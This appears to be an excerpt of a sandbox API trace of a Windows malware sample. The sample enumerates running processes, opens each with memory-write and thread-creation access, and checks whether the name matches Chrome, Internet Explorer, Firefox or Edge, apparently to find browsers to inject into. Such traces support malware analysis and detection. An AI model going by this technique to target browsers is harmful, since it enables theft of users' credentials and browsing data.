	[0221.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x517c
	[0221.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.702] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.702] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.702] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.703] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5180
	[0221.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.704] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.704] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.704] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.705] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5184
	[0221.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.706] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.706] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.706] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.707] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.707] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5188
	[0221.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.709] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.709] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.709] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.710] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.710] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0221.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x518c
	[0221.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.711] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0221.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.711] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.711] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0221.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.711] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.712] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5190
	[0221.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.712] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.713] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.713] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.713] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0221.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5194
	[0221.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.714] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.715] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.715] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.715] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.716] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5198
	[0221.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.716] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.717] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.717] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.717] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.718] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x519c
	[0221.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.718] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.719] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.719] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.719] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.720] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x51a0
	[0221.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.720] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.721] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.721] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.721] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.722] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0221.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x51a4
	[0221.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.722] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0221.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.723] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.723] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0221.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.724] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.724] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0221.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x51a8
	[0221.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.725] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.725] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.725] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.725] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.726] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0221.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x51ac
	[0221.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.726] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0221.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.727] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.727] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0221.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.727] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.728] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0221.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0221.728] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0221.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x51b0
	[0221.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.729] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0221.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.730] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.730] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0221.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.731] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.731] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0221.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x51b4
	[0221.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.732] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0221.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.732] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.733] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0221.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.733] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.733] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0221.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x51b8
	[0221.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.734] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0221.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.734] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.735] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0221.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.735] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.735] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0221.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x51bc
	[0221.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.736] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0221.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.736] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.737] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0221.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.737] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.737] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0221.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x51c0
	[0221.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.738] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0221.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.739] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.739] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0221.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.740] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.740] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0221.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x51c4
	[0221.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.741] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0221.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.741] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.742] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0221.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.742] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0221.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x51c8
	[0221.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.743] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0221.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.743] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.744] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0221.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.744] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0221.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x51cc
	[0221.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.745] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0221.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.746] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.746] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0221.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.747] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.747] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0221.748] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x51d0
	[0221.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.748] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0221.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.748] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.748] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0221.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.749] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0221.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x51d4
	[0221.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.750] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0221.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.750] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.750] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0221.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.750] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.750] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0221.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x51d8
	[0221.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.751] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0221.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.752] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.752] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0221.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.753] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.753] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0221.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x51dc
	[0221.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.754] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0221.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
